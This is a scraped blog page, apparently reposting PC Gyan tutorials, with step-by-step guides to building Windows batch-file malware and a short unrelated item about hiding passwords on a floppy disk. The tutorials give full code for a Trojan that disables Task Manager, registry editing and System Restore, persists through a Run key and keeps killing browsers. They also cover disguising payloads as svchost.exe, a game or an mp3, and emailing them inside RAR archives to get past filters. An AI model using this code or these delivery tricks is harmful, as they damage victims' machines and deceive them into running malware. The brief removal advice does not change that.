It’s been a while that the post Eradicate malware have been helping many fix malware issues, but over the time, malware have evolved too. There are new tricks up its sleeves and other surprises that will make you look ahead to the most miserable option – to reinstall your windows. With the sole motive to learn a few more strategies that malware employ to put us into trouble, we make our own malware and see it work. This will develop in us a lot of understanding how malware cause trouble, even preventing antivirus programs to remove them. This will eventually make us skilled enough to catch loop holes in malware that can be exploited to get rid of it, and we do the same at the end of the post. Now, leaving behind our good intensions, let’s put on our masks and enter the darklab!

In a previous post we had learned to make a basic batch file virus , learning a few DOS and batch basics, which did a little mischief. Well, this time we gonna turn a little more mischievous! The issue with our virus was that it ran a few tasks and later terminated, but this time, we gonna make it run continuously in a cycle, causing little close to what can be called havoc!

This time we will make a virus that will alter registry to start at startup and also place restrictions that will make removing it tough. Like many other malware do- disable system restore, disable registry editing, disable task manager, disable run, and disable folder options as well. In short, a tough one to catch hold of manually! And the virus will remain active in memory, running a process that will monitor your activity and prevent you from running any browser or IM client.

Since we have had discussed how we move around in DOS environment, we will directly speak of motives and how we accomplish them. Our main virus will as usual be a single executable. This file will be a decoy, tempting our victim to open it, posing as a crack or a game. Upon successful execution, this will launch out first batch file that will plant the main virus, another executable file at a secure location and then execute it. Hence, we see how a seemingly legitimate program causes you harm; this is what is called a Trojan horse planter. This launcher can be made to run a legitimate application at the end too, making us less suspicious of what we did in background.

As soon as the virus is planted, it is executed and the second batch file is run, that makes startup entries, apply restrictions and then as planned, runs a loop that will continuously trouble you. The point to be noted here is that the loop can either just carry out the aimed task, which is closing all internet applications in our case, or will carry out the aim and continuously refresh restrictions. In the latter case, unless the malicious process in memory is stopped, registry defaults tools fail to help you; and this is what is happening in newer viruses. It is also important to be mentioned that the registry key responsible for opening the exe files is also being edited by most viruses nowadays, making us helpless since we cant run or install our dependable antivirus. We don’t include this feature in our virus since it crosses the fine line between a prank and a dirty crime.

Thus, you can’t view the virus file, that will be super hidden, nor will you be able to restore registry defaults, which is relaxed in this case fearing avoiding the worst in case you execute the virus yourself…!

Having learned what we are going to do, we head towards code part. Open up a notepad file and key down this code, this will serve as our main batch file.

force.bat code:

@ECHO OFF

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\system32\config\svchost.exe /f

reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

REG add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

:loop

taskkill /F /IM taskmgr.exe /IM procexp.exe /IM firefox.exe /IM chrome.exe /IM iexplore.exe /IM yahoomessenger.exe /IM autoruns.exe

goto loop

After entering the code, go to save as, save this file as force.bat , while keeping save as type as All files. Now, download Bat to exe converter and convert this batch file to an exe file, while keeping options as instructed below:

1. Set visibility as invisible application.
2. Set working directory as Temporary directory.
3. Set temporary files to delete at exit.

In the version information tab, choose an icon file of a DLL and compile the batch file. You will get an exe file that will have icon of a DLL file. Rename this file to svchost.exe, this name and icon will serve as our decoy. Than change the attributes of this file to hidden, if you desire, so that naked eyes don’t find it. Use the attrib command as discussed in the previous post.

Now, the virus is ready, we need a planter that will launch the virus on your PC. For this we code this launch batch file as follows.

Launch.bat code:

@echo off

move /y svchost.exe “%windir%\system32\config\”

start %windir%\system32\config\svchost.exe

start game.exe

exit

Notice that you will need an application that will run after you run the planter, to avoid suspicion. This is a small flash game named “game.exe” in our case. And we choose icon for our launcher as a game icon. If you want it other way, you can choose an mp3 icon, and change the code as –

start song.mp3

And include into launcher a song that will be played once the launcher is executed.

After the file have been coded, name it as launch.bat . Now, we get a small flash game & an icon for it and run bat to exe converter. Choose options as we did in previous case and set the icon file as well. But this time, go to include tab and select add option and add the previously made svchost.exe file and the flash game, renamed to game.exe. Now compile this and of virus is ready.

It is an innocent looking application, claiming to be a flash game, having icon of a game, which is really tempting to try a hand on. Once executed, the contents- The launch.bat, svchost.exe and game.exe are extracted in temp folder and launch.bat is run. As programmed, the launch.bat file will move the main virus svchost.exe to config folder in system32 directory and run it. At the same time, it will run the game that is extracted in temporary folder. This way, the victim sees a game start and doesn’t suspect our Trojan planter. Now our planter has done its job and the main virus is into its place and has been run.

The main virus named as svchost.exe, even if seen through some process monitor tool, looks like a windows application, with icon of a DLL. This virus will anyways disable task manager, so that it can’t be end tasked. It also disables folder options, which prevents victim to search for it since it is super hidden. It also disables run, so that user cant launch applications like group policy editor. It disables registry editing; hence any attempt to import registry will be rejected. And then it goes into a continuous loop that will close Internet explorer, Chrome, Firefox and Yahoo messenger. You can also include other unwanted applications into this list, like process explorer, autoruns tool, malwarebytes etc. Hence, it’s a complete havoc!

Now coming to removing such nasty viruses, it goes by trial and error at first. You try system restore, its disabled, no restore points are available; you try opening task manager, it’s disabled. You try restoring registry defaults, its disabled too. Also process explorer and autoruns fail to start too.

Firstly, since the tools like Process explorer and autoruns can’t be disabled through registry (unless EXE file association is edited, which wont allow you to run any exe file), you will rename them and then run them. Since the virus was monitoring image name and end tasking it, it can’t stop the altered image name. Now, in process explorer, we analyze each of the processes. We notice a suspicious extra svachost.exe, which is running from system32\config folder, which blows its cover. We end task it and delete it. Now running autoruns, we remove its startup registry key as well. Now, the malware is gone, just the alterations in registry remains. Hence, you try cmd. Go to system32 folder and run cmd from there. In cmd, you edit the key which disables registry editing.

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

This lets you edit registry now. Import the defaults.reg entries and this must fix the rest of the issues. Note that system restore will have to be manually enabled from group policy editor GPEDIT.MSC.

Hence we see that even smarter viruses have loop holes that can be exploited and used to get rid of them.

Note: Booting into safe mode is a favorite option for many, since startup isn’t loaded. But viruses now alter the USERINIT registry key and attach itself to it, hence starting in safe mode too, making the attempt fruitless.

Source: PC Gyan

Hiding Passwords - the most unexpected way !

[Wehrdo] has posted a guide with an extremely low-tech solution to password management. He literally put the passwords on a floppy disk in the form of paper glued to the magnetic film. For those that still have some floppy disks around, this is a zero cost hack. We wouldn’t recommend this for state secrets, but for those prolific forum registrations it’s a great idea.

How to make your own Batch file Virus ?

* The article is written for educational purpose only.

It’s always been this way that we fellows be the good guys and save the day fighting malware threats… But as they say, you need to think like a criminal to catch one! And so we do the same, to understand how a malware works, how does it gains access, gains control, we will our self make a batch file based virus. A little knowledge of programming, just to extent how we do it, and knowledge of windows registry is a prerequisite.

Batch files, characterised by their .bat extension, are files containing a sequence of DOS commands that gets executed when the batch file is run. This allows you to make simple programs that perform simple tasks under limitations of DOS shell. Though higher level languages like BASIC, PASCAL and C interacts with system on lower level, batch file processing is a good start to understand malware.

The kind of malware that we are going to learn to make is one that will perform a simple task of changing desktop wallpaper, interchanging the left and right mouse keys, changing start page of internet explorer(6), and make a start-up entry so that it starts every time system starts. Though this sounds like a simple task, automation of this procedure such that it works on a single wrong click by user and runs all tasks without any confirmation and hidden is a tough job when started from scratch.

The components of the virus will be a main executable file, under cover of some attractive icon, which on execution extracts in background to a batch file and the wallpaper, then runs the batch file.

Before code, let’s learn a few basics, first on creation on batch files. These aren’t any special files created by some special applications. They are simple notepad files, where in code is written and then its extension changed to .bat. They run simple tasks like MOVE, COPY, RENAME etc , a few moderate tasks like changing file attributes ( i.e. making a file hidden, giving system attribute or removing the attributes) and a few complex tasks like altering a system registry without user intermission. The main draw back in a batch file is that it doesn’t remain active in memory (though we can make it by some loop), it just performs the stated tasks and shuts down. Hence, it can act as a trigger, and not the process itself.

Now, let’s learn a few commands of batch files. Though a basic knowledge of DOS is crucial, if not, you can still follow what’s going on. Starting with a simple rename command, the syntax is-

RENAME [Drive]: [path] filename1 filename2

Example: RENAME C:\documents and settings\aijaz.txt gyaan.dat

Hence we see we can change the extension of file as well. If the path and drive of file aren’t specified, it is assumed that the file is in the current directory where from CMD is running.

Example: RENAME aijaz.txt gyaan.dat

This command searches a file name aijaz.txt in current directory and renames it to gyaan.dat.

Coming to MOVE command, it moves the file from one path to another. It is like cut and paste. The syntax is-

MOVE [/Y |/-Y] [drive] [path] filename destination

The /Y attribute assigned allows CMD to overwrite files without confirmation, hence maintaining cover from user.

Example: MOVE /Y C:\aijaz.txt D:\

This moves the file aijaz.txt to drive D: . While moving a file, if source path isn’t mentioned, then it is assumed that the file is in current directory. But destination path is mandatory.

We use the move command to change the wallpaper. The wall paper once set, is converted to a bitmap image and is then moved to the directory–

C:\Documents and settings\”user name”\local settings\application data\Microsoft

But the windows directory may be different drive like D:, E: and even the user name isn’t known. This makes it not suitable to mention a specific path in our code. We use system parameters to identify windows drive and user profile directory. The command – %userprofile% returns the path of the location highlighted in above command. To give path in CMD using system parameters, we need to write path in quotation marks. The command to change wallpaper becomes-

MOVE /y Wallpaper1.bmp “%USERPROFILE%\Local Settings\Application Data\Microsoft”

This copies the wallpaper from current directory to the location where wallpaper is stored.

Note: It is to be kept in mind that windows actually use only uncompressed bitmap images as wallpapers. Whenever we set an image as wallpaper, it is converted to bitmap and then stored at above mentioned location in user profile with name wallpaper1, hence the reason. Thus, the wallpaper we use here should already be a bitmap image, use an image editing tool like Irfanview which does a good job at conversion to bitmap.

Once the wallpaper has been replaced, the system needs to be updated for change to take place on desktop. This is done using the command-

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

After the execution of batch file, it is desired that it isn’t available to host PC that he may open it and view the code, which discloses the location of our batch virus and also the registry key we have added. This is done by simply deleting the files.

Del /F /Q /A:SHR filename

/F forces deletion of read only files, /Q suppresses the confirmation to delete, /A deletes files based on given attributes. S- System, H- Hidden, R- Read only.

Now coming to editing registry, there are two methods of editing a key, first by making a .REG file using batch print tool to write registry keys in a file and later appending them to registry. But this method adds a couple of more lines to our code. Hence we prefer the second method of editing registry directly via command line using REG command.

The syntax to add a key to registry is-

REG ADD main key/v Sub key /t data type /d value /f

The /f parameters enables editing a key without confirmation from user. Our intention is to add a start-up entry in registry such that our code gets executed every time windows logs on. Hence the wallpaper is changed again, making the innocent user panic! The actual key we use is-

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f

The above command writes a start-up key which makes the file pointed by the key run every time windows start. We use %windir% parameter to make sure that no error is encountered in case OS is installed on some other drive.

The point to be noticed here is that the same technique is used by malware to make sure they remain active in memory. The first thing to be done having ended a malicious code execution is to terminate its start-up mechanism. Refer the post Eradicate malware.

Similarly to change the start page of internet explorer (tested on IE 6), the registry key is-

REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d http://pcgyaan.wordpress.com /f

Since IE 6 stores the default start page in registry key, it is very vulnerable to this simple attack. I am still working on changing start page of Mozilla Firefox.

Now to add a little more insult to injury, how about tying down our victim’s right arm and make him struggle with his left? We gonna switch the right and left keys of our mouse, making our victim panic even more! Here is the command….

RUNDLL32.exe USER32.DLL,SwapMouseButton

Having learned a few tricks of trade, let’s put down the final batch file code. Open a notepad file and key down this script….

@ECHO OFF

REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d http://pcgyaan.wordpress.com /f

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f

copy /y Wallpaper1.bmp ”%USERPROFILE%\Local Settings\Application Data\Microsoft”

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

RUNDLL32.exe USER32.DLL,SwapMouseButton

rename song.exe force.exe

move /y force.exe “%windir%”

del /Q force.bat

del /Q wallpaper.bmp

Save the file and change its extension to .bat. This is the core virus file. Now pick up a photo of our victim and edit it so that it will annoy him the most! This can be simply be done by opening the file in note pad and making it funny or if you how to, edit it in Photoshop. Or sites like photo funaic can be used to spoil the photo. Usually these photos are JPEG format. As mentioned earlier, we need a bitmap image. Convert it to bitmap using an image editing tool, preferably Irfanview since it preserves the quality of photo. Rename this photo to wallpaper1.

It’s quite obvious that nobody will click a suspicious looking batch file, thanks to my previous posts! The second task is to pack our batch file and wallpaper into a single file and change its icon, to mask it, so that user will be compelled to open it. The file can be made to look like a folder, or an mp3 file or a word file or anything. What you need is WinRAR and another software called IconFX.

Install IconFX and run it. In file menu, go to extract icons. Browse for shell32.dll file located in windows\system32 directory and extract and save icon of folder. You can also use the snap tool of iconFX and take snap of files to make an .ico icon file. Here we will name our packed file as song and select icon as an mp3 file icon. Just take snap of mp3 file, preferably windows media player icon. Save the icon at some location.

1. Install WinRAR on your PC. Select the two files, batch file and bitmap wallpaper by holding Ctrl key, right click and select add to archive option.
2. In the opened window, click Create SFX archive.
3. Go to Advanced tab and SFX options in it. In path to extract, select create in current folder. In setup program section, in Run after extract, add name as force.bat.
4. In Modes tab, under silent mode section, select hide all.
5. In update tab, in overwrite section, select overwrite all files.
6. In text and icon tab, under Customize SFX logo and icon, in Load SFX icon from file, browse and set icon as MP3 icon. Click OK and compress the files. You will get a single .exe file which has an icon of mp3 file. Let’s rename this file as song.

Note: The names force.bat and song.exe must not be changed, since they are referred by those names in batch code.

Now we have a file with name song, having an mp3 icon, quite innocent looking but having really naughty intensions! But the problem here is that if we mail it as it is, either clients like Yahoo doesn’t allow attaching .exe files, also when victim downloads the file, its extension is also shown, exposing our plot. Hence, in case of mailing this virus, compress it to a simple .RAR file and mail it. The victim will extract it, and then see a file with name song and icon of mp3. In curiosity, he will open it and our job is done!!

Though I am still working on making better ones, but I would like to end this post with a message that this was just for a little fun and to develop an understanding how malware works. Let’s not drift towards the wrong side of society!

Next Level ::

Source PC Gyan